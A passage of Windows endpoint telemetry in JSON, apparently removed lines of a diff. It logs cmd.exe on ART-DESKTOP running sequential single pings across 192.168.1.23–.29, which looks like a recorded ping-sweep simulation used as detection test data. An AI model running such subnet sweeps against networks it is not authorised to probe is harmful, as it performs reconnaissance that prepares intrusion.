"svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack\\SettingsRequests", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack\\SettingsRequests\\LastDownloadTime", - "registry_value": "LastDownloadTime", - "timestamp": 131883572094330000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" - }, - { - "event_type": "file", - "file_name": "e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", - "file_path": "C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "timestamp": 131883572094330000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" - }, - { - "event_type": "file", - "file_name": "e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", - "file_path": 
"C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "timestamp": 131883572094330000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" - }, - { - "event_type": "process", - "pid": 4740, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572096830000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.23", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5812, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572096980000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572096990000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572096990000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 
131883572096990000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572096990000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572096990000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572096990000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572096990000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572096990000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572096990000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" - }, - { - "event_type": "image_load", 
- "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572096990000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572096990000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" - }, - { - "event_type": "process", - "pid": 5812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572101840000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.24", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7672, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572101980000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572101990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572101990000, - "unique_pid": 
"{42FC7E13-CB5A-5C05-0000-001018AD5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572101990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572101990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572101990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572101990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572101990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572101990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - 
"image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572101990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572101990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572101990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" - }, - { - "event_type": "process", - "pid": 7672, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572106830000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.25", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7552, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572106990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572106990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" - 
}, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572106990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572106990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572106990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572106990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572106990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572106990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": 
"C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572106990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572106990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572106990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572106990000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\BITS", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\BITS\\Start", - "registry_value": "Start", - "timestamp": 131883572107770000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", - "registry_value": "BITS", - "timestamp": 131883572108080000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - 
"event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS\\PerfMMFileName", - "registry_value": "PerfMMFileName", - "timestamp": 131883572108080000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "process", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "subtype": "terminate", - "timestamp": 131883572108080000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "process", - "pid": 7552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572111840000, - "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.26", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6840, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572111980000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6840, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572111990000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6840, - "process_name": "PING.EXE", - 
"process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572111990000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6840, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572111990000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6840, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572111990000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6840, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572111990000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6840, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572111990000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6840, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572111990000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6840, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572111990000, - "unique_pid": 
"{42FC7E13-CB5B-5C05-0000-001091B25101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6840, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572111990000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6840, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572111990000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6840, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572111990000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" - }, - { - "event_type": "process", - "pid": 6840, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572116990000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.27", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2812, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572117140000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2812, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572117140000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572117140000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572117140000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572117140000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572117140000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572117140000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572117140000, - "unique_pid": 
"{42FC7E13-CB5B-5C05-0000-00100CB55101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572117140000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572117140000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572117140000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572117140000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" - }, - { - "event_type": "process", - "pid": 2812, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572121840000, - "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.28", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2416, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572121990000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}", - "unique_ppid": 
"{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2416, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572121980000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2416, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572121980000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2416, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572121980000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2416, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572121980000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2416, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572121980000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2416, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572121980000, - "unique_pid": 
"{42FC7E13-CB5C-5C05-0000-00107EB75101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2416, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572121980000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2416, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572121980000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2416, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572121980000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2416, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572121980000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2416, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572121980000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" - }, - { - "event_type": "process", - "pid": 2416, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572126990000, - "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.29", - "event_type": 